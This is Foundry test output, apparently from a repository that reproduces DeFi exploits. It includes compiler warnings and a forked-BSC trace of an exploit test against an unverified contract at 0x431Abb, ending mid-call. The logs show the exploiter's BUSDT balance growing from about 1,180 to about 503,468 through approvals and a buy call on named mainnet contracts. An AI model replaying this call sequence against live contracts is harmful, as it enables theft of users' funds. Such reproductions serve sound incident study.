Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/UnverifiedContr_0x431abb_exp.sol:94:26:
   |
94 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/UnverifiedContr_0x431abb_exp.sol:94:43:
   |
94 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                           ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/UnverifiedContr_0x431abb_exp.sol:94:61:
   |
94 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                             ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/UnverifiedContr_0x431abb_exp.sol:94:79:
   |
94 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                                               ^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 575.99ms (1.77ms CPU time)

Ran 1 test for src/test/2023-12/UnverifiedContr_0x431abb_exp.sol:ContractTest
[PASS] testExploit() (gas: 4275754)
Logs:
  Exploiter BUSDT balance before attack: 1180.008559000000000000
  Exploiter FCN balance before attack: 0.000190000000000000
  Exploiter BUSDT balance after attack: 503468.345335579475662703
  Exploiter FCN balance after attack: 125.887064171666012340

Traces:
  [10882] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 33972111 [3.397e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(BUSDT: [0x55d398326f99059fF775485246999027B3197955], "BUSDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], "FCN")
    │   └─ ← [Return]
    ├─ [0] VM::label(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], "KLEN")
    │   └─ ← [Return]
    ├─ [0] VM::label(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], "TRUST")
    │   └─ ← [Return]
    ├─ [0] VM::label(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], "MDAO")
    │   └─ ← [Return]
    ├─ [0] VM::label(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10], "FCN_BUSDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], "BUSDT_MetaWin")
    │   └─ ← [Return]
    ├─ [0] VM::label(BindingContract: [0x04c5bcFcae55591D72E01c548863F4E754C74339], "BindingContract")
    │   └─ ← [Return]
    ├─ [0] VM::label(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], "vulnContract")
    │   └─ ← [Return]
    ├─ [0] VM::label(addrToBind: [0x041285A02A7fabc448893f6c1766e4B592f46f96], "addrToBind")
    │   └─ ← [Return]
    └─ ← [Stop]

  [4784254] ContractTest::testExploit()
    ├─ [2626] TRUST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [626] TRUST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040])
    │   └─ ← [Return] [0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4], []
    ├─ [0] VM::load(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], slot: 69754373171698122749132262717936541513022023835681898290461777562612473346212 [6.975e76])
    ├─ [0] VM::load(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [626] TRUST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [626] TRUST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 69754373171698122749132262717936541513022023835681898290461777562612473346212 [6.975e76])
    ├─ [0] VM::load(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(TRUST: [0x31952292c193c05AE91e19456312E2Be1419c040], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4, 0x000000000000000000000000000000000000000000000000064fa776b71b8703)
    │   └─ ← [Return]
    ├─ [626] TRUST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 454766215707723523 [4.547e17]
    ├─ [2626] KLEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [626] KLEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f])
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [626] KLEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [626] KLEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(KLEN: [0x05CbF8417401028dE10d6B949061336dF8233a9f], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x00000000000000000000000000000000000000000000013d054d97f7d45fffff)
    │   └─ ← [Return]
    ├─ [626] KLEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5847999999999999999999 [5.847e21]
    ├─ [2648] MDAO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [648] MDAO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950])
    │   └─ ← [Return] [0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4], []
    ├─ [0] VM::load(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], slot: 69754373171698122749132262717936541513022023835681898290461777562612473346212 [6.975e76])
    ├─ [0] VM::load(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [648] MDAO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [648] MDAO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 69754373171698122749132262717936541513022023835681898290461777562612473346212 [6.975e76])
    ├─ [0] VM::load(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(MDAO: [0x6cc1eACe0794bcc5852c7Ff70656c4dF0F02d950], 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4, 0x0000000000000000000000000000000000000000000000a5e207db6cd7502f98)
    │   └─ ← [Return]
    ├─ [648] MDAO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3060000000000000012184 [3.06e21]
    ├─ [2626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08])
    │   └─ ← [Return] [0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a], []
    ├─ [0] VM::load(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], slot: 92176716289232067132282836272875158765230181307894676212186306738099599030314 [9.217e76])
    ├─ [0] VM::load(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 92176716289232067132282836272875158765230181307894676212186306738099599030314 [9.217e76])
    ├─ [0] VM::load(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(FCN: [0x0fEA057dB0e6b45fa1A0065Cd512150987F2AF08], 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a, 0x0000000000000000000000000000000000000000000000000000accdd281e000)
    │   └─ ← [Return]
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 190000000000000 [1.9e14]
    ├─ [2531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [0] VM::accesses(BUSDT: [0x55d398326f99059fF775485246999027B3197955])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000016fe6708b439b0000
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000016fe6708b439b0000
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000016fe6708b439b0000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: BUSDT: [0x55d398326f99059fF775485246999027B3197955], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000016fe6708b439b0000
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x00000000000000000000000000000000000000000000003ff7e88c750b91f000)
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1180008559000000000000 [1.18e21]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1180008559000000000000 [1.18e21]
    ├─ [2425] BUSDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter BUSDT balance before attack", val: 1180008559000000000000 [1.18e21], decimals: 18)
    ├─ [626] FCN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 190000000000000 [1.9e14]
    ├─ [295] FCN::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter FCN balance before attack", val: 190000000000000 [1.9e14], decimals: 18)
    ├─ [24643] KLEN::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x6d319970ff96b1ad6704a215240c34e0c29ec4d310f1177ff653a1f87c255dc2: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24643] TRUST::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xbae3c283805a2362dea7d8182ad72853753ddaf0ba4e2149ee9eb52525ec38a1: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24643] MDAO::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x6d319970ff96b1ad6704a215240c34e0c29ec4d310f1177ff653a1f87c255dc2: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24643] FCN::approve(vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xc8a03774798cfaf170723ca796ca9835c4fc30f2fcbfbe39ebf72471f435d053: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24562] BUSDT::approve(BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x9ec1e615b3e5607ff3a8cbfa96b4d186523eff2fccc4ec2c6aa5f134a0b8586f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [202460] BUSDT_MetaWin::buy(7690)
    │   ├─ [10834] BUSDT::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC927A27b6231783AB75eb60eFb0A3b06b97D0Bff, 42500000000000000000 [4.25e19])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC927A27b6231783AB75eb60eFb0A3b06b97D0Bff, value: 42500000000000000000 [4.25e19])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], value: 115792089237316195423570985008687907853269984665640564039415084007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9ec1e615b3e5607ff3a8cbfa96b4d186523eff2fccc4ec2c6aa5f134a0b8586f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffdb231ab2cb5e5ffff
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000003ff7e88c750b91f000 → 0x00000000000000000000000000000000000000000000003daa1a37a1c177f000
    │   │   │   @ 0xd5e8633a913f6e45eb1b22f822b57687728580520e5e904902048c33352755a1: 0x000000000000000000000000000000000000000000000074d529147a50722c00 → 0x00000000000000000000000000000000000000000000007722f7694d9a8c2c00
    │   │   └─ ← [Return] true
    │   ├─ [27934] BUSDT::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd3Ed11fAB473b1B697D39B7E98da4eE9f180203f, 127500000000000000000 [1.275e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd3Ed11fAB473b1B697D39B7E98da4eE9f180203f, value: 127500000000000000000 [1.275e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], value: 115792089237316195423570985008687907853269984665640564039287584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9ec1e615b3e5607ff3a8cbfa96b4d186523eff2fccc4ec2c6aa5f134a0b8586f: 0xfffffffffffffffffffffffffffffffffffffffffffffffdb231ab2cb5e5ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffff6c8c6acb2d797ffff
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000003daa1a37a1c177f000 → 0x000000000000000000000000000000000000000000000036c0af3927e329f000
    │   │   │   @ 0xb77df63ad6802f97b996a0ccf07dcd40a6298038b760c2fe4198675fd2cda17e: 0 → 0x000000000000000000000000000000000000000000000006e96afe79de4e0000
    │   │   └─ ← [Return] true
    │   ├─ [133119] 0x238f5426D18e117158dAf175Ad479c6180e88070::9ca89d1c(00000000000000000000000090bf82c772f16651d6ae51d42c90c84ae703eb420000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000001e0a)
